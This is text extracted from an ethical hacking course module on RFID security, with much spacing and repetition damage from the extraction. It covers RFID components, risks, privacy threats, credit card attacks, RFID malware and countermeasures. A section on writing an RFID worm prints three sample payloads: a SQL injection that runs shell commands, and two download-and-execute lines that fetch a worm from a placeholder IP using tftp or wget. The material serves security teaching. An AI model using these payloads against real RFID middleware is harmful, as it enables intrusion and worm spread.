Ethical H ackin g an d
Coun term easures
Coun term easures
Version 6
Mo d u le XXXIX
News
Module Objective
This m odule will fam iliarize you with:
• RFID
• Com pon en ts of RFID system s
y
Com pon en ts of RFID system s
• RFID System Architecture
• RFID Collision s
• RFID Risks
RFID Risks
• RFID an d Privacy Issues
• RFID Security an d Privacy Threats
• Vuln erabilities in RFID-en abled Credit Cards
Vuln erabilities in RFID en abled Credit Cards
• RFID H ackin g Tool
Module Flow
RFID RFID an d Privacy Issues
Com pon en ts of RFID system s
RFID Security an d Privacy Threats RFID system s
RFID System Architecture
Privacy Threats
Vuln erabilities in RFID System Architecture
RFID-en abled Credit Cards
RFID Collision s RFID H ackin g Tool
RFID
Radio Frequen cy Iden tification (RFID) is an autom atic iden tification
m ethod
m ethod
It tran sm its iden tity of an object in the form of a un ique serial n um ber
usin g radio waves
g
RFID system s work on the prin ciple of con tactless tran sfer of data
between data carryin g device an d its reader
RFID tags con tain at least two parts:
RFID
• In tegrated circuit to store an d process in form ation , m odulate, an d
dem odulate an (RF) sign al
Com pon en ts of RFID System s
• RFID prem ises server • RFID in tegration server
P i R q i i t l
Gen eral categories of RFID tags:
• Pa s s ive : Requires n o in tern al power source • Active : Requires in tern al power source
(Sm all battery)
• S e m i-p a s s ive ( Ba tte ry-a s s is te d ) :
RFID Collision s
RFID Tag Collision :
• RFID Tag collision happen s when m ultiple tags are
en ergized by RFID tag reader sim ultan eously, an d
reflect their respective sign als back to reader at the
g
reflect their respective sign als back to reader at the
sam e tim e
RFID Reader Collision :
• Reader collision occurs in RFID system s when
coverage area of on e RFID reader overlaps with
RFID Reader Collision :
coverage area of on e RFID reader overlaps with
that of an other reader
• This causes two differen t problem s:
• Sign al in terferen ce
RFID Risks
Busin ess Process Risk
Busin ess In telligen ce Risk
Busin ess In telligen ce Risk
Privacy Risk
• H azards of Electrom agn etic Radiation
Extern ality Risk
RFID Risks: Busin ess Process
Risk
Risk
Direct attacks on RFID system com pon en ts poten tially could un derm in e busin ess processes which the RFID system was design ed to en able
processes, which the RFID system was design ed to en able
RFID system s typically are im plem en ted to replace or en han ce a paper or partially autom ated process
Organ ization s im plem en tin g RFID system s could becom e relian t on those system s
Failure in an y com pon en t or subsystem of RFID system could result in system wide failure
Un like m ost of other risks, busin ess process risk can occur as a result of both hum an action an d n atural causes
RFID Risks: Busin ess
In telligen ce Risk
In telligen ce Risk
RFID supports wireless rem ote access to get in form ation about assets an d
pp
g
people that either previously did n ot exist or was difficult to create or
dyn am ically m ain tain
A com petitor or adversary can gain in form ation from RFID system in a
n um ber of ways:
• Eavesdroppin g on RF lin ks between readers an d tags
• Perform in g in depen den t queries on tags to obtain relevan t data
• Obtain in g un authorized access to a back-en d database which stores in form ation g about tagged item s
RFID Risks: Privacy Risk
Busin ess objectives often con flict with privacy objectives
j
p
y
j
Organ ization s can ben efit from an alysis an d sharin g of person al
in form ation obtain ed with RFID techn ology
b
gy
Privacy risk from the perspective of organ ization
• Pen alties if organ ization does n ot com ply with privacy laws an d regulation s
Privacy risk from the perspective of organ ization
im plem en tin g RFID, m ight in clude:
• Pen alties if organ ization does n ot com ply with privacy laws an d regulation s • Custom er avoidan ce or boycott of organ ization because of real or perceived
privacy con cern s about RFID techn ology
• Bein g held legally liable for an y con sequen ces of weak privacy protection s • Em ployees, shareholders, an d other stakeholders m ight disassociate with Em ployees, shareholders, an d other stakeholders m ight disassociate with
RFID Risks: Privacy Risk (con t’d)
Other factors that im pact the level of
privacy risk in clude:
• Whether person al in form ation is stored on tags
• Whether tagged item s are con sidered person al
privacy risk in clude:
gg
p
• The likelihood that the tag will be in proxim ity of com patible
readers
• Len gth of tim e records are retain ed in an alytic or archival
system s
system s
• Effectiven ess of RFID security con trols, in particular:
• Efficien cy of tag m em ory access con trol an d authen tication
m echan ism s
ec a
s
s
• Ability of tags to be disabled after their use in a busin ess
process
• Ability of users to effectively shield tags to preven t
th
i
d d
t
ti
RFID Risks: Extern ality Risk
RFID system s typically are n ot isolated from other system s an d assets in
RFID system s typically are n ot isolated from other system s an d assets in
en terprise
Extern ality risks can exploit both RF an d en terprise subsystem s of an RFID
system :
• Major extern ality risk for RF subsystem is hazards resultin g from electrom agn etic radiation
• Major extern ality risk for en terprise subsystem is com puter n etwork attacks on t k d d i d li ti
n etworked devices an d application s
As extern ality risk by defin ition in volves risks outside of RFID system ; it is
distin ct for both busin ess process an d busin ess in telligen ce risks
RFID an d Privacy Issues
An y organ ization con tem platin g the use of RFID should first
y
g
p
g
en sure that it is aware of its privacy obligation s un der differen t
laws before it starts accum ulatin g data
RFID attacks used to bypass person al privacy
in form ation are:
• By placin g RFID tags hidden from eyes, an d usin g it for stealth
trackin g
U i
iq
id
tifi
id d b RFID f
fili
d
• Usin g un ique iden tifiers provided by RFID for profilin g and
iden tifyin g con sum er pattern an d behavior
Coun term easures
Methods that are used to avoid RFID attacks:
RSA Blocker Tags:
g
• It helps in m ain tain in g the privacy of con sum er by
spam m in g from an y reader who attem pts to scan
tags without the authorization
Kill S i h
Kill Switches:
RFID Security an d Privacy Threats
Sn iffin g
Trackin g
Spoofin g
Spoofin g
Replay attacks
Sn iffin g
RFID t
d
i
d t b
d bl b
li
t
d
RFID tags are design ed to be readable by an y com plian t reader
It is easy to collect RFID data by eavesdroppin g on wireless RFID
chan n el
Un restricted access to tag data can have serious im plication s
Collected tag data m ight reveal in form ation such as m edical
Trackin g
RFID techn ology facilitates secret m on itorin g of in dividual’s location
RFID techn ology facilitates secret m on itorin g of in dividual s location
an d action s
RFID readers placed in strategic location s can record RFID tag’s un ique
respon ses, this can then be persisten tly associated with a person ’s
iden tity
RFID tags without un ique iden tifiers facilitates trackin g by form in g
Spoofin g
Attackers can m im ic authen tic RFID tags by
Attackers can m im ic authen tic RFID tags by
writin g appropriately form atted data on
blan k RFID tags
Tag clon in g is an other kin d of spoofin g
attack which produces un authorized copies
attack, which produces un authorized copies
of legitim ate RFID tags
Researchers from J ohn s H opkin s Un iversity
recen tly clon ed a
cryptographically-protected Texas In strum en ts digital
i
d
Replay Attacks
RFID relay devices can in tercept an d retran sm it RFID queries, which
e ay de ces ca te cept a d et a s
t
que es,
c
offen ders can use to abuse various RFID application s
En glan d’s n ew RFID-en abled licen se plates, e-Plates is an exam ple of
m odern RFID system that is susceptible to attack by a relay device
Active e-Plate tags con tain an en crypted ID code that is stored in UK
Min istry of Tran sport’s vehicle database
An attacker can record en crypted iden tifier when an other car’s
li
l
i
d
d
l
i l
Den ial-of-service
hi
l i
d
b
k
d d
b
l
Thieves can exploit RFID tags an d back-en d databases to steal
RFID-tagged item s by rem ovin g tags from the item s com pletely or by
puttin g them in a foil lin ed booster bag that blocks RFID readers
query sign als an d tem porarily deactivates the item s
q
y
g
p
y
An other attack takes the opposite approach; floods an RFID system
pp
pp
;
y
with m ore data than it can han dle
Attacker can rem ove RFID tags an d plan t them on other item s,
causin g RFID system s to record useless data, discreditin g, an d
Protection again st RFID Attacks
Cryptography:
• Min im alist cryptography
• H um an -com puter authen tication • H ash locks
• RFID Detektor (http:/ / tin yurl.com / )
• Data Privatizer (https:/ / shop foebud org/ )
Detection an d evasion :
• Data Privatizer (https:/ / shop.foebud.org/ ) • RFID Guardian (www.rfidguardian .org)
Tem porary Deactivation :
• Con sum ers can deactivate their RFID tags to avoid m ost m odern -day threats
RFID Guardian
RFID Guardian is a m obile battery-powered device that offers person al RFID security an d privacy m an agem en t for people
RFID Guardian m on itors an d regulates RFID usage on behalf of custom ers
It is m ean t for person al use an d m an ages the RFID tags within physical proxim ity of a person
It t lik RFID d q i t d d di th t d it l It acts like an RFID reader, queryin g tags, an d decodin g the tag respon ses, an d it can also em ulate an RFID tag, allowin g it to perform direct in -ban d com m un ication s with other RFID readers
RFID Guardian is the in tegration of four separate security
• Auditin g
• Key m an agem en t
RFID Guardian is the in tegration of four separate security properties in to a sin gle device:
RFID Malware
RFID m alware is tran sm itted an d executed via RFID tag:
• Threats arise when crim in als cause valid RFID tags to behave in an un expected ways
• If certain vuln erabilities exist in RFID software, an RFID tag can be in fected with a virus
• When an un suspectin g reader scan s an in fected tag, there is a dan ger of tag exploitin g a vuln erability
Classes of RFID Malware:
• RFID Exploit:
• It is a m alicious RFID tag data that exploits som e vuln erabilities of RFID system
Classes of RFID Malware:
• RFID Worm :
• It is an RFID-based exploit that abuses a n etwork con n ection to achieve self-replication
• RFID Virus:
It i RFID b d l it th t t l lf li t it d t • It is an RFID-based exploit that auton om ously self-replicates its code to
H ow to Write an RFID Virus
Viruses perform s two types of fun ction s, it replicates itself usin g database an d
option ally it executes pay load
p
y
p y
Broadly there are two types of virus replication :
• Database system s usually offer a way to obtain curren t run n in g queries for system adm in istration purposes
• In two version s of virus, on e con tain s sin gle query an d other con tain s m ultiple queries
Replication Usin g Self-Referen tial Queries
In two version s of virus, on e con tain s sin gle query an d other con tain s m ultiple queries • Sin gle query virus requires less features from database, but can n ot carry SQL code as a
payload
• Whereas m ultiple queries require a database that supports SQL load as a payload
R li i U i Q i
• Quin e is a program that prin ts its own source code
• It copies its own source code in to database then it is latter copied on to tags
• Quin e requires m ultiple queries, which m ean s they are n ot supported on all databases
Replication Usin g Quin es
H ow to Write an RFID Worm
Worm is a program that self-propagates across a n etwork, exploitin g
o
s a p og a
t at se
p opagates ac oss a et o
, e p o t
g
security flaws in widely-used services
A RFID
b
l i i
i fl
i
li
An RFID worm propagates by exploitin g security flaws in on lin e
RFID services
RFID worm s do n ot require users to do an y thin g to propagate,
although they spread via RFID tags, if given the opportun ity
• RFID tags are too sm all to carry en tire worm
• Tag con tain s on ly en ough of worm to down load the
rest from the com puter con n ected to In tern et
Propagation :
H ow to Write an RFID Worm
(con t’d)
(con t d)
RFID tag can either in clude bin ary code to down load an d execute worm or shell
com m an ds
Exam ple 1 - Executin g shell com m an ds usin g SQL Server
Apples'; EXEC Master..xp_cmdshell 'shell commands';
Exam ple 2 - Down loadin g an d executin g a worm on Win dows
cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe
Exam ple 3 - Down loadin g an d executin g a worm on Lin ux usin g SSI
<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x
/tmp/worm; /tmp/worm "-->
Defen din g Again st RFID
Malware
Malware
Lock down RFID user accoun ts an d database accoun ts
Disable or rem ove an y features that are n ot required
To avoid SQL in jection :
• An y data that is copied in to a SQL statem en t should be checked an d escaped usin g the An y data that is copied in to a SQL statem en t should be checked an d escaped usin g the fun ction s provided by database API
• For better security, do n ot copy data in to SQL statem en ts, but use prepared statem en ts an d param eter bin din g
Clien t-side scriptin g can be preven ted by properly escapin g data in serted in to
Clien t-side scriptin g can be preven ted by properly escapin g data in serted in to
H TML pages
RFID Exploits
SQL In jection :
• If RFID m iddleware does n ot process the data read from the tag correctly, it is possible to exploit this vuln erability of database by executin g SQL code that is stored on the tag
Q
j
of database by executin g SQL code that is stored on the tag
Clien t-side Scriptin g:
• Exploitin g dyn am ic features offered by m odern browsers,
Vuln erabilities in RFID-en abled
Credit Cards
Credit Cards
Trackin g Attack
• In this attack, a legitim ate m erchan t exceeds the expected use
of his/ her RFID credit card readers
Trackin g Attack
of his/ her RFID credit card readers
Eavesdroppin g Attack
• In an eavesdroppin g attack, an adversary uses an an ten n a to
record com m un ication between a legitim ate RF device an d
d
reader
• As eavesdroppin g happen s on live com m un ication ; foil
shieldin g does n ot help to preven t this particular attack
• Eavesdroppin g feasibility depen ds on m an y factors in cludin g
d di
Vuln erabilities in RFID-en abled
Credit Cards (con t’d)
Credit Cards (con t d)
Ski
i
A
k
• In this attack, an un authorized an d poten tially clan destin e reader reads tags from either close proxim ity or from a distan ce
Skim m in g Attack
g p y
• J ohn n y Carson attack on RFID credit cards occurs when an attacker has access to physical m ail stream to read RF data from credit cards in tran sit to their own ers
• This attack is particularly powerful because the adversary gain s p y p y g accessory kn owledge such as cardholder address
• A com prom ised reader at a parkin g garage could skim custom er’s credit-card in form ation at sam e tim e that they read the parkin g pass • Fob-type RFID credit cards are n ow available for attachm en t to key
h k h l h k
rin gs, exposin g them to attack when con sum ers leave their keys un atten ded
• This behavior is seen m ost often in valet-parkin g situation s, or in
gym n asium s where it is com m on for users to leave their keys together in an un secured box by the door
Vuln erabilities in RFID-en abled
Credit Cards (con t’d)
Credit Cards (con t d)
Replay an d relay Attack
• In a replay attack, an attacker broadcasts an exact replay of the tran spon der en d of the radio sign al recorded from a past tran saction between an Rfdevice an d a reader
• This attack com m on ly kn own as the relay attack uses a m an in the m iddle • This attack, com m on ly kn own as the relay attack, uses a m an in the m iddle
attack to relay an tran sien t con n ection from a legitim ate reader through on e or m ore adversarial devices to a legitim ate tag which m ay be at a con siderable distan ce
• The distan ce at which the relay attack can succeed is lim ited on ly by the laten cy hi h ill b l d b h k d l
which will be tolerated by the attacked protocol
Cross con tam in ation Attack
• The cross con tam in ation attack occurs when private in form ation such as
cardholder n am e, n um ber, an d expiration date learn ed by an attacker in an RF con text are then used by the attacker in a differen t con text
RFDum p
RFDum p is a tool that allows you to read RFID tags within range, an d to chan ge
p
y
g
g ,
g
an d alter all the data stored in the RFID tag
RFDum p is a backen d GPL tool to directly in teroperate with an y RFID
ISO-Reader to m ake the con ten ts stored on RFID tags accessible
The user data can be displayed an d m odified usin g an H ex an d either an ASCII
editor
Man agem en t Con trols
A m an agem en t con trol in volves oversight of the security of the RFID system
A m an agem en t con trol in volves oversight of the security of the RFID system
The m an agem en t of an organ ization m ight n eed to update existin g policies to
address RFID im plem en tation s
Man agem en t con trols are typically in volved in risk assessm en t, system plan n in g,
an d system acquisition as well as security certification s accreditation s an d
an d system acquisition , as well as security certification s, accreditation s, and
assessm en ts
Operation al Con trols
An operation al con trol in volves the action s perform ed on a daily basis by the
t
’
d
i i t
t
d
system ’s adm inistrators and users
• Physical access con trols restrict access to authorized person n el where
There are several types of operation al con trols:
Physical access con trols restrict access to authorized person n el where the RFID system s are deployed
• Proper placem en t of RF equipm en t helps to avoid in terferen ce an d reduce hazards from electrom agn etic radiation
• Organ ization s can destroy tags after they are n o lon ger useful to
d i f i i h i d
preven t adversaries from gain in g access to their data
• Operator train in g en sures that person n el usin g the system follow appropriate guidelin es an d policies
• In form ation labels an d n otice can in form users of the in ten ded
Techn ical Con trols
A techn ical con trol uses techn ology to m on itor or restrict the action s that can be
perform ed within the system
perform ed within the system
Techn ical con trols are listed specifyin g the stan dards while others are available
on ly in proprietary system s
Man y techn ical con trols related to a tag require the tag to perform addition al
com putation s an d to have addition al volatile m em ory
Techn ical con trols exist for all com pon en ts of RFID system s in cludin g the RF
Techn ical con trols exist for all com pon en ts of RFID system s, in cludin g the RF,
en terprise, an d in ter-en terprise subsystem s
The gen eral types of RF subsystem con trols in clude
con trols to:
• Provide authen tication an d in tegrity services to RFID com pon en ts an d tran saction s
• Protect RF com m un ication between reader an d tag
con trols to:
RFID Security
The tags can be set to have a security bit turn ed on in reserved m em ory block on the tag
Ran dom tran saction IDs should be presen t on rewritable tags
Im proved passwords via persisten t state
M l h i i f d d i h i f h
Mutual authen tication of tag an d reader with privacy for the tag
• PRF Private Authen tication Schem e • TreeBased Private Authen tication
A T Ph T S h • A TwoPhase Tree Schem e
Security to protect the read-write option s
Sum m ary
Radio Frequen cy Iden tification (RFID) is an autom atic iden tification m ethod
RFID tag is an electron ic device that holds data
An RFID reader is a device that is used to in terrogate an RFID tag
RFID station s can read an d update in form ation stored in to the RFID tag
RFID stan dards defin e Air In terface Protocol, Data Con ten t, Con form an ce, an d Application s